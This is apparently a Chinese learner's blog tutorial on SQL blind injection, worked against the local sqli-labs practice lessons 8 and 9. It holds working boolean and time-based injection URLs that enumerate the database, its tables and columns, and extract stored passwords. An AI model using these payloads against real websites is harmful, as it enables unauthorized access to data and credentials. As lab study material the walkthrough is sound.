sql盲注
在刚接触sql注入的时候还不太清楚sql盲注是什么,很多东西都要自己
去体会才能知道到底是什么样子的。
sql注入之盲注
盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。
盲注分为两类:
1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据 你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。
2.时间盲注 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。
需要用到的函数:
Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
先在mysql里测试下这几个函数:
这里使用的是security库
length函数:
substr函数:
Ascii:
sleep跟if由于是时间盲注就不一一测试了。
布尔盲注
sqli-less-8为布尔盲注这里就用它做下测试
刚开始用id=1’/ ’) “ 测试了一下发现不会爆出错误信息 只有正确跟错误 less-8应该就是布尔盲注了吧 然后通过上面的函数首先构造一个猜测数据库名长度的函数
http://127.0.0.1/Less-8/?id=1'and (length(database()))>10 --+
返回错误 说明length小于10
然后继续猜测是不是大于5
http://127.0.0.1/Less-8/?id=1' and (length(database()))>5 --+
返回正确说明长度大于5小于10
最后得到结果为
http://127.0.0.1/Less-8/?id=1' and (length(database()))=8 --+
返回正确 长度为八 也就是security
接下来利用substr函数与ascii函数构造猜测数据库名ascii码的值的语句 因为现在只知道长度不知道具体内容
构造语句如下
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))>100 --+
返回正确说明第一个字母的ascii码大于100
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))>110 --+
返回正确
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))<120 --+
返回正确
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))<115 --+
返回错误
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(database(),1,1)))=115 --+
返回正确 通过查ascii码表可知 ascii(115)=s 也就是security 的第一个字母
通过改变database()后面的数字 可以继续猜测第二个字母第三个字母
接下来改变语句去猜测表名
构造这个语句的时候发现自己还是不够熟练 弄错了好几次
http://127.0.0.1/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100 --+
返回正确 当等于101的时候返回正确 101为 e 查看mysql 得知第一个表为emails 正确结果
http://127.0.0.1/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))=114 --+
猜测列名只需要改变几个地方
http://127.0.0.1/Less-8/?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100 --+
获取user表的内容 经过猜测 ascii为 105 为i 也就是表的第一个列名 id的第一个字母 同样 通过修改 limit 0,1 获取第二个列名 修改后面1,1的获取当前列的其他字段
接着获取 username 与 password 里面的内容 因为知道了列名所以直接 select password from users 就可以获取password里面的内容 username一样
具体语句如下
http://127.0.0.1/Less-8/?id=1' and (ascii(substr(( select password from users limit 0,1),1,1)))=68--+
ascii(68)=D 正确
手工盲注很繁琐 需要一个一个的试 不过现在还是先学习手工理解了sql注入的原理再去用工具比较好
时间盲注
sqli-less-9为时间盲注
前面已经说过slee()函数跟if函数了
这里就直接构造如下语句
http://127.0.0.1/Less-9/?id=1' and (if(ascii(substr(database(),1,1))>100,sleep(10),null)) --+
如果返回正确则 页面会停顿10秒,返回错误则会立马返回
其他与布尔盲注都是差不多的
post类的布尔盲注与时间盲注
前面说的都是get类的盲注,post类的布尔盲注只是把and换成or其他不变,时间盲注有些不同因为在post类里sleep函数会被放大很多也就是说那个延时时间会很长,不过并不影响我们进行测试。
